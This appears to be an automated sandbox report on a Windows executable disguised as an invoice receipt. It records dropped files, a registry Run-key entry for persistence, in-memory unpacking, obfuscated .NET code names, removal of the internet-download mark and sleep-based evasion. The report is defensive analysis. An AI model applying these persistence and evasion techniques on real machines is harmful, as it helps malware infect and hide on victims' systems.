Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: G2M8C76V_INV0ICE_RECEIPT.exe, 00000000.00000003.293275271.0000000003380000.00000004.00000001.sdmp, G2M8C76V_INV0ICE_RECEIPT.exe, 00000000.00000003.293559055.0000000003510000.00000004.00000001.sdmp, chmac.exe, 0000000D.00000003.312413916.00000000031E0000.00000004.00000001.sdmp, chmac.exe, 0000000D.00000003.312089409.0000000003050000.00000004.00000001.sdmp, chmac.exe, 0000000F.00000003.334018187.0000000003130000.00000004.00000001.sdmp, chmac.exe, 0000000F.00000003.332132170.00000000032C0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: G2M8C76V_INV0ICE_RECEIPT.exe, 00000000.00000003.293275271.0000000003380000.00000004.00000001.sdmp, G2M8C76V_INV0ICE_RECEIPT.exe, 00000000.00000003.293559055.0000000003510000.00000004.00000001.sdmp, chmac.exe, 0000000D.00000003.312413916.00000000031E0000.00000004.00000001.sdmp, chmac.exe, 0000000D.00000003.312089409.0000000003050000.00000004.00000001.sdmp, chmac.exe, 0000000F.00000003.334018187.0000000003130000.00000004.00000001.sdmp, chmac.exe, 0000000F.00000003.332132170.00000000032C0000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Unpacked PE file: 14.2.chmac.exe.4830000.9.unpack
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Unpacked PE file: 16.2.chmac.exe.2500000.4.unpack

.NET source code contains potential unpacker

Show sources

Source: 14.2.chmac.exe.4830000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.chmac.exe.4830000.9.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.2.chmac.exe.2500000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.2.chmac.exe.2500000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_738D1000 push eax; ret	0_2_738D102E
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 3_1_00401F16 push ecx; ret	3_1_00401F29
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_72EE1000 push eax; ret	13_2_72EE102E
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_00401F16 push ecx; ret	14_2_00401F29
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_00632881 push edi; ret	14_2_00632882
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_00632570 push ecx; ret	14_2_00632572
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_00632DFD push ecx; ret	14_2_00632DFE
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_006325C5 push ecx; ret	14_2_006325D2
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_00632E75 push edi; ret	14_2_00632E76
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_006326E4 push eax; ret	14_2_006326E6
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_006326A8 push edi; ret	14_2_006326B6
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_00632E81 push edi; ret	14_2_00632E82
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_00632685 push edi; ret	14_2_00632686
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_1_00401F16 push ecx; ret	14_1_00401F29
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00401F16 push ecx; ret	16_2_00401F29
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00A52881 push edi; ret	16_2_00A52882
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00A52DFD push ecx; ret	16_2_00A52DFE
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00A525D0 push ecx; ret	16_2_00A525D2
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00A525DD push eax; ret	16_2_00A525DE
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00A52570 push ecx; ret	16_2_00A52572
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00A526A8 push edi; ret	16_2_00A526B6
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00A52E81 push edi; ret	16_2_00A52E82
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00A52E75 push edi; ret	16_2_00A52E76
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_1_00401F16 push ecx; ret	16_1_00401F29

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405DA3

Source: 14.2.chmac.exe.4830000.9.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 14.2.chmac.exe.4830000.9.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 16.2.chmac.exe.2500000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 16.2.chmac.exe.2500000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	File created: C:\Users\user\AppData\Local\Temp\nsiCC2.tmp\esrskf.dll	Jump to dropped file
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	File created: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	File created: C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp\esrskf.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	File created: C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp\esrskf.dll	Jump to dropped file

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kyvrnrwl			Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kyvrnrwl			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

File opened: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe TID: 5352	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe TID: 5356	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe TID: 4200	Thread sleep time: -280000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe TID: 6304	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe TID: 6568	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe TID: 6808	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe TID: 6764	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe TID: 2884	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe TID: 5904	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Window / User API: foregroundWindowGot 939

Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

API coverage: 6.8 %

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_00405D7C FindFirstFileA,FindClose,	0_2_00405D7C
